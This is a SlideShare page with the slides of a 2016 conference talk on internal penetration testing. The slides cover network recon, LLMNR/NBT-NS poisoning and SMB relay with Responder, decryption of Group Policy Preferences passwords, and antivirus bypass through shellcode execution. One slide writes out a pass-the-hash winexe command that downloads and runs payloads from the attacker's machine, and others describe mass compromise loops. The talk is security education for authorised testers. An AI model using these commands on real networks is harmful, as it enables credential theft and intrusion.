SlideShare a Scribd company logo

MAIOR FESTIVAL HACKER DA AMÉRICA LATINA

M
marcioalma

This presentation talks about tricks and tools to use during internal penetration tests gigs. It was presented at Roadsec SP in November 2016.

Technology
1 of 33
Download to read offline
O MAIOR FESTIVAL HACKER DA AMÉRICA LATINA
Internal Pentest From z3r0 to h3r0 by Márcio "pimps" Almeida
Internal Pentest From z3r0 to h3r0 – Márcio Almeida * Disclaimer * • Slides in english but I’ll speak in Portuguese. • That presentation don’t have any tool created or invented by me, only how I use "well known" tools and how I can automatize their use... • On this presentation I’ll only talk about ideas and tricks that I personally use during Internal penetration test engagements. 3
Internal Pentest From z3r0 to h3r0 – Márcio Almeida whoami • a.k.a Pimps • CTF Player (web and crypto) • Proud Member of TheGoonies CTF Team • Check our writeups at: https://thegoonies.rocks • Penetration Tester (+7 years) • Tempest, Cipher, SpiderLabs and Securus Global • Previous Presentations • Black Hat SP, BSides LV, Ekoparty, Thotcon, AlligatorCon, YSTS… 22/11/16 4
Internal Pentest From z3r0 to h3r0 – Márcio Almeida Scenario we will talk about • Internal Penetration Testing • 100% Black Box (Plug and Play) • Time constriction (3-5 days) • Without “low-hanging fruits” • Anti-virus and some other protections in place 22/11/16 5
Internal Pentest From z3r0 to h3r0 – Márcio Almeida Agenda • Unfortunately we have only 40m so I choose: • Reconnaissance Tricks on Blackbox Testing • LLMNR and NBT-NS Poisoning • GPOs / GPPs • Shellcode Execution - SCE 6
Internal Pentest From z3r0 to h3r0 – Márcio Almeida RECONNAISSANCE TRICKS ON BLACKBOX TESTING 7
Internal Pentest From z3r0 to h3r0 – Márcio Almeida Domain Computer Accounts • First enumerate all Domain Controllers: • nslookup • ping domain_name • dsquery • Etc… • Use enum4linux to enumerate all users on the domain (if null session is enabled or using a cred). • Extract all machine usernames (accounts with $ on the username, like: user$) • Nmap all those userX$.domain_name to get their IP addresses and open ports. Repeat the nmap process in all different subnets. 22/11/16 8
Internal Pentest From z3r0 to h3r0 – Márcio Almeida Identifying “Live Subnets” • You don’t need scan all IPs to identify live subnets… • Scan well known IP address with well known ports to identify live addresses in subnets: • x.x.x.1, x.x.x.101, x.x.x.192, x.x.x.201, x.x.x.253, x.x.x.254 • Scan common ports: 21, 22, 23, 25, 53, 80, 443, 445, 3389 22/11/16 9
Internal Pentest From z3r0 to h3r0 – Márcio Almeida Identifying “Live Hosts” • Once you find a subnet with a live IP, then scan the whole subnet with a tuned nmap command: • nmap -A -T4 -n -top-ports 1000 -- max-rtt-timeout=500ms --initial-rtt- timeout=200ms --min-rtt- timeout=200ms --open --stats-every 5s x.x.x.0/24 22/11/16 10
Internal Pentest From z3r0 to h3r0 – Márcio Almeida LLMNR AND NBT-NS POISONING 11
Internal Pentest From z3r0 to h3r0 – Márcio Almeida LLMNR and NBT-NS Poisoning • The victim machine wants to go to print server at printserver, but mistakenly types in pintserver. • The DNS server responds to the victim saying that it doesn’t know that host. • The victim then asks if there is anyone on the local network that knows the location of pintserver • The attacker responds to the victim saying that he actually is the pintserver • The victim believes the attacker and sends its own username and NTMLv2 hash to the attacker. • The attacker can now crack the hash to discover the password 12
Internal Pentest From z3r0 to h3r0 – Márcio Almeida LLMNR and NBT-NS Poisoning 13
Internal Pentest From z3r0 to h3r0 – Márcio Almeida Responder by @lgandx https://github.com/lgandx/Responder • Performs LLMNR/NBT-NS/mDNS poisoning in a easy and highly effective way and stores the captured hashes and clear-text credentials into files. • Pre-requisites: Install Python • git clone https://github.com/lgandx/Responder.git • cd Responder • ./Responder.py -I eth0 –rPv • Use john or hashcat to crack the captured NTMLv2 hashes via dictionary attack… If you don’t have a good wordlist you can use the rockyou.txt. Works well to me in most ocasions... 14
Internal Pentest From z3r0 to h3r0 – Márcio Almeida DEMO Responder by @lgandx https://www.youtube.com/watch?v=mgAHX4h1ojI 15
Internal Pentest From z3r0 to h3r0 – Márcio Almeida Responder + Proxenet by @hugsy https://proxenet.readthedocs.io/en/dev/mitm/ • Use Responder to spoof NetBIOS packets and poison local network Windows workstation WPAD configuration, and redirect traffic to our evil box. • Add the plugin oPhishPoison.py to the autoload directory of proxenet and start it. • ln -sf proxenet-plugins/oPhishPoison.py proxenet- plugins/autoload/oPhishPoison.py • ./proxenet -b YOUR_IP -p 8008 -i –N • From the moment proxenet and Responder are configured and running, fake LLMNR and WPAD responses will be sent to the victims. By default, the loaded plugin will replace known binary content types (such as Office documents, ZIP files, RAR archives, etc.) with PE executables containing your payloads. • Please visit the link for detailed configuration. 16
Internal Pentest From z3r0 to h3r0 – Márcio Almeida DEMO Responder + Proxenet by @hugsy https://www.youtube.com/watch?v=eN_HwFkyYyw 17
Internal Pentest From z3r0 to h3r0 – Márcio Almeida Quick Overview: SMBRelay 18
Internal Pentest From z3r0 to h3r0 – Márcio Almeida Responder + MultiRelay http://g-laurent.blogspot.com.br/2016/10/introducing-responder-multirelay-10.html • MultiRelay was built to work in conjunction with Responder.py, the common usage scenario is: • Set SMB and HTTP to Off in Responder.conf • ./Responder.py -I eth0 -rv (on one screen) • ./tools/MultiRelay.py -t Target_IP -u Administrator/Daaccount/OtherAdmin/ALL (on another screen). 19
Internal Pentest From z3r0 to h3r0 – Márcio Almeida Responder + MultiRelay http://g-laurent.blogspot.com.br/2016/10/introducing-responder-multirelay-10.html • Once a relay has been successful, MultiRelay will give you an interactive shell allowing you to: • Remotely dump the LM and NT hashes on the target (that you can pass-the-hash after) • Remotely dump any registry keys under HKLM (sensitive information and configurations) • Read any file on the target. • Download any file on the target. • Execute any command as System on the target. 20
Internal Pentest From z3r0 to h3r0 – Márcio Almeida MultiRelay DEMO by @lgandx https://www.youtube.com/watch?v=c5GT9pAtnIw 21
Internal Pentest From z3r0 to h3r0 – Márcio Almeida GPO – GROUP POLICY OBJECT GPP – GROUP POLICY PROPERTIES 22
Internal Pentest From z3r0 to h3r0 – Márcio Almeida Group Policies (GPO) • SYSVOL is a share present on the Domain Controllers to which all authenticated users have read access. • SYSVOL contains logon scripts, group policy data, and other domain-wide data which needs to be available anywhere. • All domain Group Policies are stored here: • <DOMAIN_CONTROLLER>SYSVOL<DOMAIN_NAME>Policies 23
Internal Pentest From z3r0 to h3r0 – Márcio Almeida 24 Clear-text Credentials on SYSVOL
Internal Pentest From z3r0 to h3r0 – Márcio Almeida Group Policy Preferences (GPP) • In 2006, Microsoft Bought Desktop Standard’s “PolicyMaker” which they re-branded & released with Windows Server 2008 as “Group Policy Preferences.” • One of the most useful features of Group Policy Preferences (GPP) is the ability to store and use credentials in several scenarios (change local admin password, configure prints, configure shares, configure services, etc). • Those credentials are stored Encrypted. They are encrypted with AES-256 which should be good enough… But… 25
Internal Pentest From z3r0 to h3r0 – Márcio Almeida Thanks Microsoft ;-* 26 https://msdn.microsoft.com/en-us/library/cc422924.aspx
Internal Pentest From z3r0 to h3r0 – Márcio Almeida Decrypting GPP cpassword 27 https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1 root@kali:~# gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw Local*P4ssword!
Internal Pentest From z3r0 to h3r0 – Márcio Almeida Metasploit Module GPP 28
Internal Pentest From z3r0 to h3r0 – Márcio Almeida SHELLCODE EXECUTION - SCE 29
Internal Pentest From z3r0 to h3r0 – Márcio Almeida Shellcode Execution - SCE • HIGHLY EFFECTIVE for anti-virus bypass • My own experience: worked perfectly 100% of the times that I needed use. • Works beautifully using winexe or psexec (God bless the Pass the Hash :-P) • Using a Domain Admin account is possible automatize the Mass p0wn4g3 on the network “scripting” the command reading the targets from a list. • Using a Meterpreter script you can also automatize the capture of evidences on all compromised machines (screenshot, ifconfig, hashdump, mimikatz, getinfo, etc…) 30
Internal Pentest From z3r0 to h3r0 – Márcio Almeida Shellcode Execution - SCE • Using Microsoft PowerShell is possible download the binary (wget like style) to a temporary directory, execute it and erase the file after: • On Attacker machine execute: python –m SimpleHTTPServer • Will enable http://YOUR_MACHINE:8000/ on Attacker machine • winexe --user=DOMAIN/USER%HASH_OR_PASSWORD //TARGET "cmd /c "del teste.bat & echo powershell -c "(new- object System.Net.WebClient).DownloadFile('http://YOUR_MACHINE :8000/sce.32.exe','sce.32.exe')" >> teste.bat & echo powershell -c "(new-object System.Net.WebClient).DownloadFile('http://YOUR_MACHINE :8000/hack.bat','hack.bat')" >> teste.bat & echo hack.bat >> teste.bat & teste.bat"" 31
Internal Pentest From z3r0 to h3r0 – Márcio Almeida SCEPWN-NG by @joshuaskorich https://github.com/joshuaskorich/scepwn-ng • Using a samba share you can execute the binary directly from the sharing folder injecting the meterpreter session directly on memory without any file ever touch the disk! • Details of how configure the environment on scepwn-ng github. • After configure your environment, and get a privileged account, just execute: • ./scepwn-ng.rb -u 'username%password_or_hash' -t TARGET • If you put this command in a loop to read from a list of targets and use a Meterpreter script to automatize commands on targets, it becomes a mass auto-pwn tool. 32
Obrigado! Twitter: @marcioalm Email: marcioalma@gmail.com #dontstophacking

Recommended

Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Daniel Bohannon
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...CODE BLUE
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guysNick Landers
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionBeau Bullock
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the KingdomDennis Maldonado
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2Chris Gates
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 

Recommended

Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Daniel Bohannon
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...CODE BLUE
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guysNick Landers
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionBeau Bullock
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the KingdomDennis Maldonado
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2Chris Gates
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...EC-Council
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani GolandCODE BLUE
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0Will Schroeder
 
BSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointBSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointAndrew McNicol
 
I See You
I See YouI See You
I See YouAndrew Beard
 
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin VigoBreaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin VigoShakacon
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysJoff Thyer
 
'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh'Malware Analysis' by PP Singh
'Malware Analysis' by PP SinghBipin Upadhyay
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made SimplePaul Melson
 
BSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersBSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersAndrew McNicol
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwarePriyanka Aash
 
Security events in 2014
Security events in 2014Security events in 2014
Security events in 2014Chong-Kuan Chen
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellBeau Bullock
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8guest441c58b71
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat Security Conference
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainPriyanka Aash
 
Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Andrew McNicol
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat Security Conference
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with MetasploitM.Syarifudin, ST, OSCP, OSWP
 
Jornalismo e Universo Hacker: uma parceria que deu certo (Ramon de Souza & Fe...
Jornalismo e Universo Hacker: uma parceria que deu certo (Ramon de Souza & Fe...Jornalismo e Universo Hacker: uma parceria que deu certo (Ramon de Souza & Fe...
Jornalismo e Universo Hacker: uma parceria que deu certo (Ramon de Souza & Fe...Ramon de Souza
 

More Related Content

What's hot

SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...EC-Council
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani GolandCODE BLUE
 
BSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointBSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointAndrew McNicol
 
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin VigoBreaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin VigoShakacon
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysJoff Thyer
 
'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh'Malware Analysis' by PP Singh
'Malware Analysis' by PP SinghBipin Upadhyay
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made SimplePaul Melson
 
BSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersBSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersAndrew McNicol
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwarePriyanka Aash
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellBeau Bullock
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8guest441c58b71
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat Security Conference
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainPriyanka Aash
 
Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Andrew McNicol
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat Security Conference
 

What's hot (20)

SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
BSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointBSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPoint
 
I See You
I See YouI See You
I See You
 
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin VigoBreaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
 
BSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersBSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathers
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
 
Security events in 2014
Security events in 2014Security events in 2014
Security events in 2014
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
 
Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
 

Viewers also liked

Jornalismo e Universo Hacker: uma parceria que deu certo (Ramon de Souza & Fe...
Jornalismo e Universo Hacker: uma parceria que deu certo (Ramon de Souza & Fe...Jornalismo e Universo Hacker: uma parceria que deu certo (Ramon de Souza & Fe...
Jornalismo e Universo Hacker: uma parceria que deu certo (Ramon de Souza & Fe...Ramon de Souza
 
You Can't Buy Security - DerbyCon 2012
You Can't Buy Security - DerbyCon 2012You Can't Buy Security - DerbyCon 2012
You Can't Buy Security - DerbyCon 2012jadedsecurity
 
Practical hardware attacks against SOHO Routers & the Internet of Things
Practical hardware attacks against SOHO Routers & the Internet of ThingsPractical hardware attacks against SOHO Routers & the Internet of Things
Practical hardware attacks against SOHO Routers & the Internet of ThingsChase Schultz
 
Web PenTest Sample Report
Web PenTest Sample ReportWeb PenTest Sample Report
Web PenTest Sample ReportOctogence
 
I Have the Power(View)
I Have the Power(View)I Have the Power(View)
I Have the Power(View)Will Schroeder
 
Secure Architecture and Programming 101
Secure Architecture and Programming 101Secure Architecture and Programming 101
Secure Architecture and Programming 101QAware GmbH
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beau Bullock
 
PTES: PenTest Execution Standard
PTES: PenTest Execution StandardPTES: PenTest Execution Standard
PTES: PenTest Execution StandardSource Conference
 
Bringing SDR to the pentest community - BlackHat USA 2014
Bringing SDR to the pentest community - BlackHat USA 2014Bringing SDR to the pentest community - BlackHat USA 2014
Bringing SDR to the pentest community - BlackHat USA 2014jmichel.p
 
Practical Enterprise Security Architecture
Practical Enterprise Security Architecture Practical Enterprise Security Architecture
Practical Enterprise Security Architecture Priyanka Aash
 
Mobile hacking, pentest, and malware
Mobile hacking, pentest, and malwareMobile hacking, pentest, and malware
Mobile hacking, pentest, and malwareAmmar WK
 
Btpsec Sample Penetration Test Report
Btpsec Sample Penetration Test ReportBtpsec Sample Penetration Test Report
Btpsec Sample Penetration Test Reportbtpsec
 
import pybr12: experiencias de inclusión en la última PyCon Brazil
import pybr12: experiencias de inclusión en la última PyCon Brazilimport pybr12: experiencias de inclusión en la última PyCon Brazil
import pybr12: experiencias de inclusión en la última PyCon BrazilFATEC São José dos Campos
 
The Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseThe Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseWill Schroeder
 
iOS Hacking: Advanced Pentest & Forensic Techniques
iOS Hacking: Advanced Pentest & Forensic TechniquesiOS Hacking: Advanced Pentest & Forensic Techniques
iOS Hacking: Advanced Pentest & Forensic TechniquesÖmer Coşkun
 
Mobile Application Pentest [Fast-Track]
Mobile Application Pentest [Fast-Track]Mobile Application Pentest [Fast-Track]
Mobile Application Pentest [Fast-Track]Prathan Phongthiproek
 

Viewers also liked (20)

Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
Jornalismo e Universo Hacker: uma parceria que deu certo (Ramon de Souza & Fe...
Jornalismo e Universo Hacker: uma parceria que deu certo (Ramon de Souza & Fe...Jornalismo e Universo Hacker: uma parceria que deu certo (Ramon de Souza & Fe...
Jornalismo e Universo Hacker: uma parceria que deu certo (Ramon de Souza & Fe...
 
You Can't Buy Security - DerbyCon 2012
You Can't Buy Security - DerbyCon 2012You Can't Buy Security - DerbyCon 2012
You Can't Buy Security - DerbyCon 2012
 
Practical hardware attacks against SOHO Routers & the Internet of Things
Practical hardware attacks against SOHO Routers & the Internet of ThingsPractical hardware attacks against SOHO Routers & the Internet of Things
Practical hardware attacks against SOHO Routers & the Internet of Things
 
Web PenTest Sample Report
Web PenTest Sample ReportWeb PenTest Sample Report
Web PenTest Sample Report
 
Nii sample pt_report
Nii sample pt_reportNii sample pt_report
Nii sample pt_report
 
I Have the Power(View)
I Have the Power(View)I Have the Power(View)
I Have the Power(View)
 
Pentest trends 2017
Pentest trends 2017Pentest trends 2017
Pentest trends 2017
 
Secure Architecture and Programming 101
Secure Architecture and Programming 101Secure Architecture and Programming 101
Secure Architecture and Programming 101
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
 
PTES: PenTest Execution Standard
PTES: PenTest Execution StandardPTES: PenTest Execution Standard
PTES: PenTest Execution Standard
 
Bringing SDR to the pentest community - BlackHat USA 2014
Bringing SDR to the pentest community - BlackHat USA 2014Bringing SDR to the pentest community - BlackHat USA 2014
Bringing SDR to the pentest community - BlackHat USA 2014
 
Practical Enterprise Security Architecture
Practical Enterprise Security Architecture Practical Enterprise Security Architecture
Practical Enterprise Security Architecture
 
Mobile hacking, pentest, and malware
Mobile hacking, pentest, and malwareMobile hacking, pentest, and malware
Mobile hacking, pentest, and malware
 
Btpsec Sample Penetration Test Report
Btpsec Sample Penetration Test ReportBtpsec Sample Penetration Test Report
Btpsec Sample Penetration Test Report
 
import pybr12: experiencias de inclusión en la última PyCon Brazil
import pybr12: experiencias de inclusión en la última PyCon Brazilimport pybr12: experiencias de inclusión en la última PyCon Brazil
